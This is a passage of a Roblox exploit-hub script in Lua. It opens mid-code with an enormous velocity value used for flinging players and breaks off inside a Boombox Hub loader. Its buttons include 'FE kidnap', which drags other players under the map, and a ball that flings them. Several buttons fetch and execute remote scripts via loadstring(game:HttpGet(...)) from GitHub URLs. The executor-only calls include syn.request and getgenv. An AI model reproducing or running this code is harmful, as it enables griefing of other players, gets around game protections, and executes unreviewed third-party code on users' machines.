0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 BAV.AngularVelocity = Vector3.new(9990000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000,9990000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000,9990000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000) end wait(.3) player.Torso.Anchored = false while wait(.3) do if handle:FindFirstChild("BP",true) then handle.CanCollide = false end BP.Position = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(0,y,0) wait(.3) if handle:FindFirstChild("BP",true) then handle.CanCollide = false end BP.Position = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(0,y2,0) end end end end) end end }) Main:AddButton({ Title = "FE Ball Spin", Description = "spin around", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/ballspin.txt"))() end }) Main:AddButton({ Title = "FE kidnap", Description = "press z on player when close to them and must have a tool that has a sit part in it so like a stroller or sum brings them under the map", Callback = function() game:GetService("Players").LocalPlayer:GetMouse().KeyDown:connect(function(key) if key == 'z' then local h = game:GetService("Players").LocalPlayer.Character.Humanoid:Clone() local plr = game:GetService("Players").LocalPlayer.Character local CF = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame local lp = game:GetService("Players").LocalPlayer h.Parent = game:GetService("Players").LocalPlayer.Character h.Name = "Hum" game:GetService("Players").LocalPlayer.Character.Humanoid:Destroy() for _,v in pairs(game:GetService("Players").LocalPlayer:GetDescendants()) do if v.ClassName == "Tool" then v.Parent = plr end end wait(.5) tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(300, Enum.EasingStyle.Linear) tween = tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(0, -1000, 0)}) tween:Play() end end) end }) Main:AddButton({ Title = "FE 500 lb ball", Description = "like carry ball mouse button1 down for throw ball at someone and flings them idk needs a tool tho", Callback = function() _G.specifictoolname = false _G.toolname = "BoomBox" loadstring(game:HttpGet('https://raw.githubusercontent.com/DigitalityScripts/roblox-scripts/main/500%20Pounds%20Converted%20[1%20Tool].lua'))() end }) Main:AddButton({ Title = "FE Boombox Hub V2", Description = "for boomboxes", Callback = function() local Request; if syn then Request = syn.request elseif request then Request = request elseif http_request then Request = http_request end local Create = function(Class,Properties) Properties = Properties or {}; local Obj = Instance.new(Class) for K,V in next, Properties do if rawequal(K,'Parent') then continue; end Obj[K] = V; end if Properties['Parent'] then Obj['Parent'] = Properties['Parent'] end return Obj end workspace['FallenPartsDestroyHeight'] = 0/1/0 local UI, Origin = game:GetObjects('rbxassetid://5344970025&version=54')[1]; UI['Parent'] = game:GetService('CoreGui') local Main, Notification, Control, Default, G, RL = UI['Main-Frame'], UI['Notification'], UI['Minimize/Close'], Color3.fromRGB(217,60,56), getgenv or function() return _G end, true G = G(); G.__mode = 'k'; G['C'] = {}; C.__mode = 'k'; G['Create'] = Create local CBackground, CImage, CText, CScroll = {}, {}, {}, {} local Cast = { BackgroundColor3 = CBackground; ImageColor3 = CImage; TextColor3 = CText; ScrollBarImageColor3 = CScroll; } local T = UI:GetDescendants(); for A = 1,#T do local B = T[A] for C,D in next, Cast do coroutine.resume(coroutine.create(function() if tostring(B[C]) == tostring(Default) then D[#D+1] = B; end end)) end end; T = nil local Menu, Sectors, RFE = Main['Main-Menu'], Main['Sector-Holder'], game:GetService('SoundService').RespectFilteringEnabled local Dashboard = Sectors['Home'] local Tabs, TMenu = Dashboard['Tab-Frame']['Tab-Holder'], Dashboard['Tab-Menu'] Notification['Parent'] = game:GetService('CorePackages'); Notification['Main-Frame'].Position = UDim2.new(1.036,0,.753,0) local Tween = function(Obj,Time,Style,Direction,Table) game:GetService('TweenService'):Create(Obj,TweenInfo.new(Time,Enum.EasingStyle[Style],Enum.EasingDirection[Direction],0,false,0),Table):Play() end Main['Position'] = Main['Position'] + UDim2.new(-1,0,0,0); Origin = Main['Position']; Tween(Main,.6,'Quad','Out',{Position = Main['Position'] + UDim2.new(1,0,0,0)}) Control['Position'] = Control['Position'] + UDim2.new(-1,0,0,0); Tween(Control,.6,'Quad','Out',{Position = Control['Position'] + UDim2.new(1,0,0,0)}) local Push = Instance.new('BindableEvent') local Notify = function(Text,Duration) Duration = Duration or 4 coroutine.wrap(function() local Clone = Notification:Clone(); local Frame = Clone['Main-Frame']; Clone['Parent'] = game:GetService('CoreGui'); Frame['TextBox'].Text = Text Push:Fire() local Event = Push['Event']:Connect(function() Tween(Frame,.4,'Quad','InOut',{Position = Frame['Position'] + UDim2.new(0,0,-.121,0)}) end) Tween(Frame,.4,'Quad','InOut',{Position = UDim2.new(.8707,0,.753,0)}); wait(Duration + .4); Tween(Frame,.4,'Quad','InOut',{Position = UDim2.new(1.036,0,.753,0)}); wait(.4) Clone:Destroy(); Event:Disconnect() end)() end coroutine.wrap(function() wait(1.6) game:GetService('UserInputService')['InputBegan']:Wait() Notify('._ Boombox-Hub Loaded: discord.gg/bnDsbVvHmU for support.',4) wait(.4) if RFE then Notify('RFE is enabled on this game. Setting Time Positions and using Backpack-Plays are disabled.',5) end wait(.4) Notify('Visualizer is currently not working. A massive update for Boombox Hub will come soon.',7) end)() local Debounce = true local Draggable = function(Frame) local DToggle, DInput, DStart, SPos local Upd = function(Input) if Debounce then Delta = Input['Position'] - DStart; Prime = UDim2.new(SPos['X'].Scale, SPos['X'].Offset + Delta['X'], SPos['Y'].Scale, SPos['Y'].Offset + Delta['Y']) Tween(Frame,.06,'Sine','Out',{Position = Prime}) end end C[#C+1] = Frame['InputBegan']:Connect(function(Input) if (Input.UserInputType == Enum.UserInputType.MouseButton1 or Input.UserInputType == Enum.UserInputType.Touch) then DToggle = true DStart = Input.Position SPos = Frame.Position C[#C+1] = Input['Changed']:Connect(function() if (Input.UserInputState == Enum.UserInputState.End) then DToggle = false end end) end end) C[#C+1] = Frame['InputChanged']:Connect(function(Input) if (Input.UserInputType == Enum.UserInputType.MouseMovement or Input.UserInputType == Enum.UserInputType.Touch) then DInput = Input end end) C[#C+1] = game:GetService('UserInputService').InputChanged:Connect(function(Input) if (Input == DInput and DToggle) then Upd(Input) end end) end Draggable(Main); Draggable(Control) local MSelected = Menu['Home'] local MNavigate, TNavigate = function(Button,Y) C[#C+1] = Button['MouseButton1Click']:Connect(function() if Debounce then Debounce, MSelected = false, Button local T = Menu:GetChildren(); for I = 1,#T do local V = T[I] if V:IsA('TextButton') then if V ~= Button then if table.find(CText,V) then table.remove(CText,table.find(CText,V)) end Tween(V,.3,'Quint','InOut',{TextColor3 = Color3.fromRGB(100,100,100)}) else CText[#CText+1] = V Tween(V,.3,'Quint','InOut',{TextColor3 = Default}) end end end Tween(Sectors,.6,'Quad','InOut',{Position = UDim2.new(0,0,Y,0)}); wait(.6) Debounce = true end end) C[#C+1] = Button['MouseEnter']:Connect(function() if MSelected ~= Button then Tween(Button,.3,'Quint','InOut',{TextColor3 = Color3.fromRGB(170,170,170)}) end Button['MouseLeave']:Wait() if MSelected ~= Button then 